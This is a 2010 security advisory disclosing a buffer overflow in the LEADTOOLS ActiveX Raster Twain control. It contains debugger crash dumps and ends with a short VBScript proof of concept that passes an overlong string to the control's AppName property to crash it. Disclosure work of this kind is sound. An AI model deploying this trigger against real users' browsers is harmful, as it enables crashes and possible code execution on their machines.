LEADTOOLS ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Remote Buffer Overflow PoC
Vendor: LEAD Technologies, Inc. Product Web Page: http://www.leadtools.com Affected Version: 16.5.0.2
Summary: With LEADTOOLS you can control any scanner, digital camera or capture card that has a TWAIN (32 and 64 bit) device driver. High-level acquisition support is included for ease of use while low-level functionality is provided for flexibility and control in even the most demanding scanning applications.
Desc: The Raster Twain Object Library suffers from a buffer overflow vulnerability because it fails to check the boundry of the user input.
Tested On: Microsoft Windows XP Professional SP3 (EN) Windows Internet Explorer 8.0.6001.18702 RFgen Mobile Development Studio 4.0.0.06 (Enterprise)
===============================================================
(2c4.2624): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00130041 ebx=100255bc ecx=01649000 edx=00183984 esi=0013ef6c edi=00000000 eip=7c912f4e esp=0013eda8 ebp=0013eda8 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 ntdll!wcscpy+0xe: 7c912f4e 668901 mov word ptr [ecx],ax ds:0023:01649000=???? 0:000> g (2c4.2624): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00410039 ebx=00410039 ecx=00150000 edx=00150608 esi=00150000 edi=00410041 eip=7c96c540 esp=0013f220 ebp=0013f228 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 ntdll!RtlpNtMakeTemporaryKey+0x6a74: 7c96c540 807b07ff cmp byte ptr [ebx+7],0FFh ds:0023:00410040=??
==================================================================
Registers: -------------------------------------------------- EIP 7C912F4E EAX 00130041 EBX 100255BC -> 10014840 -> Asc: @H@H ECX 01649000 EDX 001839DC -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA EDI 00000000 ESI 0013EF6C -> BAAD0008 EBP 0013EDA8 -> 0013EDDC ESP 0013EDA8 -> 0013EDDC
--
EIP 7C96C540 EAX 00410039 EBX 00410039 ECX 00150000 -> 000000C8 EDX 00150608 -> 7C97B5A0 EDI 00410041 ESI 00150000 -> 000000C8 EBP 0013F228 -> 0013F278 ESP 0013F220 -> 00150000
ArgDump: -------------------------------------------------- EBP+8 016479B0 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA EBP+12 0018238C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA EBP+16 00000000 EBP+20 0013EF6C -> BAAD0008 EBP+24 100255BC -> 10014840 -> Asc: @H@H EBP+28 0013EDB8 -> 00000000
--
EBP+8 00150000 -> 000000C8 EBP+12 00410039 EBP+16 7C96DBA4 -> Asc: RtlGetUserInfoHeap EBP+20 00000000 EBP+24 00410041 EBP+28 7C80FF12 -> 9868146A
CompanyName LEAD Technologies, Inc. FileDescription LEADTOOLS ActiveX Raster Twain (Win32) FileVersion 16,5,0,2 InternalName LTRTNU LegalCopyright © 1991-2009 LEAD Technologies, Inc. OriginalFileName LTRTNU.DLL ProductName LEADTOOLS® for Win32 ProductVersion 16.5.0.0
Report for Clsid: {00165752-B1BA-11CE-ABC6-F5B2E79D9E3F} RegKey Safe for Script: True RegKey Safe for Init: True Implements IObjectSafety: False
Exception Code: ACCESS_VIOLATION
Disasm: 7C912F4E MOV [ECX],AX (ntdll.dll) Disasm: 7C96C540 CMP BYTE PTR [EBX+7],FF (ntdll.dll)
Exception Code: BREAKPOINT
Disasm: 7C90120E INT3 (ntdll.dll)
Seh Chain: -------------------------------------------------- 1 7C839AC0 KERNEL32.dll 2 FC2950 VBSCRIPT.dll 3 7C90E900 ntdll.dll
7C912F4E MOV [ECX],AX <--- CRASH 7C96C540 CMP BYTE PTR [EBX+7],FF <--- CRASH 7C90120F RETN <--- CRASH
==================================================================
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk
24.08.2010
Zero Science Lab Advisory ID: ZSL-2010-4960 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4960.php
PoC:
<object classid='clsid:00165752-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'>
targetFile = "C:\Program Files\RFGen40\LtocxTwainu.dll" prototype = "Property Let AppName As String" memberName = "AppName" progid = "LTRASTERTWAINLib_U.LEADRasterTwain_U" argCount = 1
arg1=String(9236, "A")
target.AppName = arg1
</script>
|